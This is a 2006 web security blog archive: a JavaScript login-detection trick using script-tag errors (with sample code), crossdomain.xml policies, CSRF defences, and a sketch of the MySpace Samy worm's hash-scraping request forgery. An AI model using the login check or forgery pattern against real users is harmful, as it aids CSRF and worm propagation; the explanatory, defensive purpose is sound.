About the Author

Chris Shiflett

Hi, I’m Chris: entrepreneur, community leader, husband, and father. I live and work in Boulder, CO.


All posts for Dec 2006

JavaScript Login Check

Jeremiah discovered a creative technique for testing whether someone is logged in to a particular site. The approach is pretty simple - when you browse a web site, many pages differ depending upon whether you're currently logged in. This may not be true of every page on the target site, but it's pretty easy to find at least one page where it is. This distinction is the basis of the technique.

Using <script src="">, you can cause a victim's browser to load a page and treat it as JavaScript. If the page isn't really JavaScript, an error is generated. If the page is different depending upon whether the victim is logged in, the error is also different. Pretty simple, right?

Here's an example:

<script src="http://amazon.com/"></script>

If you load a page with this <script> tag, you'll see an error in the error console. The error generated when I'm logged in differs from the one generated when I'm not: although only the line numbers differ, that's enough to distinguish between the two.

This could be a nice technique to use in combination with CSRF, because an attacker could test whether the victim is currently logged in on a particular site before trying to forge any requests. (It also gives the attacker better statistics for the attack's success rate.)

Try it out for yourself, and be sure to view the source to see how it works. It's easy to add more tests. Here's the one for Amazon:

'http://amazon.com/': {
    'name': 'Amazon',
    'login_msg': 'missing } in XML expression',
    'login_line': '114',
    'logout_msg': 'missing } in XML expression',
    'logout_line': '113'
}
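
For a sense of how the page might wire this together, here's a minimal sketch (my own reconstruction, not the demo's actual source): a window.onerror handler compares the reported line number against the table above, and a dynamically created <script> tag triggers the load.

var sites = {
    'http://amazon.com/': {
        'name': 'Amazon',
        'login_msg': 'missing } in XML expression',
        'login_line': '114',
        'logout_msg': 'missing } in XML expression',
        'logout_line': '113'
    }
};

function check(url) {
    var site = sites[url];

    // Inspect the error produced when the page is parsed as JavaScript.
    window.onerror = function (msg, file, line) {
        if (line == site['login_line']) {
            alert('Logged in at ' + site['name']);
        } else if (line == site['logout_line']) {
            alert('Not logged in at ' + site['name']);
        }
        return true; // suppress the error console entry
    };

    // Load the target page as if it were a script.
    var script = document.createElement('script');
    script.src = url;
    document.getElementsByTagName('head')[0].appendChild(script);
}

check('http://amazon.com/');

The msg argument is ignored here for brevity; a real checker would compare login_msg and logout_msg as well, since line numbers alone can collide.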

By the way, Merry Christmas!

YouTube Fixes Security Vulnerability

Until recently, YouTube was vulnerable to cross-domain Ajax attacks due to their open crossdomain.xml policy. I notified them as soon as I discovered the vulnerability, and although I have yet to receive a reply, it appears they have fixed the problem:

<cross-domain-policy> 
    <allow-access-from domain="*.youtube.com" /> 
</cross-domain-policy>

Unfortunately, this is causing problems for some Flash / Flex developers who use YouTube's API, and nothing has been published explaining the change or advising developers how to work within the new constraints. In fact, I'm not positive that my report prompted the change. It could be a coincidence.

Renaun Erickson writes:

Seems like we need some Adobe dev center write ups in this area, touching on Mashups, Open APIs, and proper usage of crossdomain.xml when used with other systems in place.

I agree, but at the moment, Adobe is setting a bad example:

<cross-domain-policy> 
    <allow-access-from domain="*" /> 
    <allow-access-from domain="*.macromedia.com" secure="false" /> 
    <allow-access-from domain="*.adobe.com" secure="false" /> 
</cross-domain-policy>

Unlike Flickr, YouTube didn't just move their API to a separate domain. Instead, they restricted access to *.youtube.com. Joe Berkovitz, a Flash / Flex developer and author of ReviewTube, would rather see them take Flickr's approach:

YouTube, if you want to be safe and not screw up Flash / Flex developers, please move your API to a different domain and put a liberal crossdomain.xml on that host. Thanks.
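
To make the Flickr approach concrete, here's roughly what such an arrangement looks like (illustrative policies for a hypothetical example.com, not Flickr's actual files). The main site keeps a closed policy, and the liberal one lives on a separate API host:

www.example.com/crossdomain.xml:

<cross-domain-policy>
    <allow-access-from domain="*.example.com" />
</cross-domain-policy>

api.example.com/crossdomain.xml:

<cross-domain-policy>
    <allow-access-from domain="*" />
</cross-domain-policy>

The open policy is acceptable on the API host as long as nothing there relies on cookie-based authentication; a forged request riding the victim's browser then gains an attacker nothing.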

John Dowdell, who works for Adobe, also wrote about this issue. Hopefully Adobe will begin to educate developers about the security risks.

Google Web Accelerator Debate

I was browsing Ajaxian and stumbled upon a rant from late last year about Google Web Accelerator (GWA):

Google has reintroduced their Google Web Accelerator with a vengeance. It was evil enough the first time around, but this time it's downright scary.

This is sensationalism at its worst. There doesn't appear to be anything new since the first time this issue was discussed.

In case you missed it, the controversy is whether GWA should pre-fetch links on a page. Some web applications use links for important actions like deleting content, and when such "pages" are pre-fetched, GWA is actually performing these actions rather than just fetching content. There is apparently an ongoing debate about where to place the blame.

In 2002, I wrote HTTP Developer's Handbook. As a result, whether right or wrong, I have some pretty strong opinions about how the HTTP specification is being interpreted. However, before discussing SHOULD versus MUST, there is an important point being missed by those who are quick to blame Google for their own mistakes. Every example I have seen of a link that performs an action is either not going to be pre-fetched by GWA due to the presence of a query string, or it's vulnerable to CSRF (cross-site request forgery). Sometimes it's both.

Here are some examples:

<a href="/delete.php?item=socks">Remove Socks from Cart</a>
<a href="/delete.php">Remove All from Cart</a></p>

Although only the second link is eligible for prefetching by GWA, both of these links are vulnerable to CSRF. (Read my article about CSRF if you're not sure what it is.) Anyone who is logged in and sends a request for one of these URLs will perform the indicated action. You can add an anti-CSRF token to these links to help protect against this vulnerability:

<a href="/delete.php?item=socks&token=abcd">Remove Socks from Cart</a>
<a href="/delete.php?token=abcd">Remove All from Cart</a>

If you don't use an anti-CSRF token, you need some other mechanism to protect against CSRF.

The string abcd is a placeholder intended to represent a random string - a shared secret between the server and a single client. Because these links each include a query string, neither is eligible for prefetching by GWA. If you're like me, you hate query strings anyway, because they're ugly. :-) Let's try another example:

<a href="/delete/socks/abcd">Remove Socks from Cart</a>
<a href="/delete/all/abcd">Remove All from Cart</a>

Whether you prefer subject-verb or verb-subject, I think you'll agree that the presence of the anti-CSRF token in the URL is ugly. However, these links are both eligible for prefetching by GWA and not vulnerable to CSRF. Those who want to blame Google can only point to examples like this. As far as I know, it's the only type of link that presents a valid case against GWA's behavior, yet it's not one that I've seen cited anywhere.

Regarding the HTTP specification, there is the oft-quoted section on safe methods:

In particular, the convention has been established that the GET and HEAD methods SHOULD NOT have the significance of taking an action other than retrieval. These methods ought to be considered "safe". This allows user agents to represent other methods, such as POST, PUT and DELETE, in a special way, so that the user is made aware of the fact that a possibly unsafe action is being requested.

Those who insist on violating this recommendation focus on the semantic distinction between SHOULD NOT and MUST NOT. Luckily, SHOULD NOT is well defined in another specification, RFC 2119:

This phrase, or the phrase "NOT RECOMMENDED" mean that there may exist valid reasons in particular circumstances when the particular behavior is acceptable or even useful, but the full implications should be understood and the case carefully weighed before implementing any behavior described with this label.

What implications? :-)

Rules aside, using GET to perform actions violates a standard idiom that has become commonplace - clicking a link only fetches content. POST is represented differently for a reason. Browsers can warn before sending a POST request again (an issue I discuss in detail in one of my articles), whereas a GET request might be re-sent whenever the user navigates through the browser history. If such a request initiates an action, it can result in undesired behavior. Imagine losing your entire shopping cart contents, just because you went back a few pages. Would you bother continuing, or would you lose interest and leave? Food for thought.

Focusing on aesthetics alone, I can see where an interface designer might prefer a link for simple actions like logging out. Therefore, I asked my good friend Jon Tan to demonstrate how to use CSS to make a form submission button look exactly like a link. (This approach also happens to make it easy to add an anti-CSRF token.) He came through in style.
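
A minimal sketch of the idea (my own illustration, not Jon's actual markup): strip the submit button's chrome with CSS so it reads as a link, and carry the anti-CSRF token in a hidden field. The /logout.php path and abcd token are placeholders.

<style>
    form.link { display: inline; }
    form.link button {
        border: 0;
        padding: 0;
        background: transparent;
        color: #00e;               /* typical link blue */
        text-decoration: underline;
        cursor: pointer;
    }
</style>

<form action="/logout.php" method="post" class="link">
    <input type="hidden" name="token" value="abcd" />
    <button type="submit">Log Out</button>
</form>

Because the action now travels by POST, GWA won't prefetch it, and the hidden token guards against CSRF.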

I'll leave you with a funny statement by Mark Pilgrim that someone pointed out. It seems appropriate in this situation:

Besides the run-of-the-mill morons, there are two factions of morons that are worth special mention. The first work from examples, and ship code, and get yelled at, just like all the other morons. But then when they finally bother to read the spec, they magically turn into assholes and argue that the spec is ambiguous, misleading in some way, ignorable because nobody else implements it, or simply wrong. These people are called sociopaths. They will never write conformant code regardless of how good the spec is, so they can safely be ignored.

He continues with a description of the other faction:

The second faction of morons work from examples, ship code, and get yelled at. But when they get around to reading the spec, they magically turn into advocates and write up tutorials on what they learned from their mistakes. These people are called experts. Virtually every useful tutorial in the world was written by a moron-turned-expert.

To which faction do you belong?

Ajax Security

Recently, Jeremiah posted an article about Ajax security. He's a good writer and manages to clarify some misconceptions, but I disagree with one of his points about XSS. (I'll get to that in a minute.) His discussion on XSS begins with a question and (safe) answer:

Does Ajax make Cross-Site Scripting (XSS) attacks worse? I hope not.

He goes on to explain all of the exploits that are possible with plain JavaScript before touching on an important point about the social impact of Ajax:

Ajax has fired up interest in JavaScript. Research in JavaScript has led to new malware discoveries whose potential severity is amplified by ubiquitous XSS vulnerabilities.

A year ago, Keith Casey asked me a probing question about Ajax in an interview for CodeSnipers.com:

How does Ajax change security? Are developers prepared for it?

At that time, I hadn't given much thought to any of this, but I managed to give an answer that's still relevant today:

Within the next few years, we're certain to see more advanced cross-site scripting (XSS) attacks emerge, because client-side technologies are getting more and more sophisticated. The popularity of Ajax will also generate an increased number of attackers who possess a rich understanding of client-side technologies. In other words, Ajax won't make cross-site scripting (XSS) vulnerabilities more likely, but it will make them more dangerous.

Yes, Ajax makes XSS attacks worse. It's too late for "I hope not." :-)

Jeremiah does make a concession:

To be fair, the Samy Worm that hit MySpace and JS.Yamanner on Yahoo exploited XHR for propagation.

He qualifies this statement, however, with something that's not true:

The attack could have just as easily been perpetrated using plain JavaScript. Ajax is irrelevant in this scenario.

The reason this isn't true is buried within Samy's technical explanation:

Finally we can do a POST! However, when we send the post it never actually adds a friend. Why not? Myspace generates a random hash on a pre-POST page (for example, the "Are you sure you want to add this user as a friend" page). If this hash is not passed along with the POST, the POST is not successful. To get around this, we mimic a browser and send a GET to the page right before adding the user, parse the source for the hash, then perform the POST while passing the hash.
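
The crucial step is reading the hash out of the pre-POST page, and that requires XMLHttpRequest. Here is the generic pattern in sketch form (hypothetical URLs and field names, not Samy's actual code); remember that the worm runs as an XSS payload on the target site, so these are same-origin requests:

// Fetch the pre-POST confirmation page and scrape the hash from its source.
var xhr = new XMLHttpRequest();
xhr.open('GET', '/confirm_add_friend', false); // synchronous, for brevity
xhr.send(null);
var hash = xhr.responseText.match(/name="hash" value="([^"]+)"/)[1];

// Replay the POST with the scraped hash, mimicking the real form submission.
var post = new XMLHttpRequest();
post.open('POST', '/add_friend', false);
post.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
post.send('friendID=12345&hash=' + encodeURIComponent(hash));

A plain link or form can send a forged request, but only script that can read the response body can obtain the hash first. That's what Ajax adds to the attack.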

If this is possible without Ajax, we're all in big trouble. Via private email, Jeremiah clarified his point:

I was trying to say that just because the Samy worm used Ajax technology, it doesn't mean that if a web site (MySpace) uses it then it's at additional risk.

That's certainly true, and it underscores a very valid point being made in the article. However, I want to make sure people don't miss the fact that, regardless of whether you use Ajax, it can be used against you.

Web Builder 2.0 Recap

Web Builder 2.0 turned out to be a good conference. I must admit to being a bit lukewarm about this particular conference beforehand, because the "2.0" in the name made me think of vacuous marketing talks, but the webmaster track had some solid technical content, including talks by Ask and Cal. (Cal was the track chair.)

To the conference's credit, none of the 17 talks with Ajax in the title spelled it AJAX. Of course, I guess that would be like having a talk about PERL at YAPC. :-)

I spent the first day of the conference working, so I'm sure I missed some good talks. I spoke on the second day, after which I managed to catch Chris Lea of Media Temple speaking about the challenges of large scale hosting, which was interesting and informative.

My speaking style has been changing lately - I've been using mostly images and code examples in my slides. In fact, very few slides have any bullets at all, and I may abandon bullets entirely. It makes the slides less useful out of context, but I think it makes the talks themselves much better.

Of a full room, only four people had ever heard of CSRF, and I think many walked out with work to do.

The slides are available here:

http://shiflett.org/security-2.0.pdf

Note: These slides will be linked from the OmniTI talks archive soon.